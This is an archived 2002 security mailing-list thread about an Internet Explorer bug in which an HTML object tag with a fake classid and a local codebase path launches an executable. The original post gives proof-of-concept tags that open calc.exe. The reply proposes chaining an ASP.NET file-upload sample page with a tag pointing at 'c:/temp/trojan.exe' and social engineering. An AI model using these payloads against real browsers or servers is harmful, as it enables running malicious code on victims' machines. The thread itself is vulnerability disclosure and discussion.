Vulnerability Development mailing list archives

Re: IExplorer

From: "CT" <ct () arnet com ar>
Date: Thu, 7 Mar 2002 02:34:59 -0300

http://server/quickstart/aspplus/samples/webforms/ctrlref/htmlctrl/HtmlInput
File/VB/HtmlInputFile1.aspx
+
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/temp/trojan.exe"></object>

Probably with this example [careless combination] and social engineering, a
silly IIS box manager it affects ... in another way it is not checked since
I have not had time for the moment. Best regards

CT
www.heinekenteam.com
I wanted to install Opera in my Windows box,
but... Luciano Pavarotti ate up.

----- Original Message -----
From: "Steve" <steve () frij com au>
To: <vuln-dev () securityfocus com>; <bugtraq () securityfocus com>
Sent: Wednesday, March 06, 2002 8:54 PM
Subject: IExplorer

I know we have seen many websites already showing this as a problem.


   <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/winnt/system32/calc.exe"></object>
   <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/windows/system32/calc.exe"></object>

Of course, this is part of the HTML that is causing this problem, but I

was

unable to reformat the string to cause any substantial privilege

escalation

in the syste, via this bug.

Current thread:

IExplorer Steve (Mar 06)
- Re: IExplorer CT (Mar 06)
- <Possible follow-ups>
- RE: IExplorer Chris Eidem (Mar 07)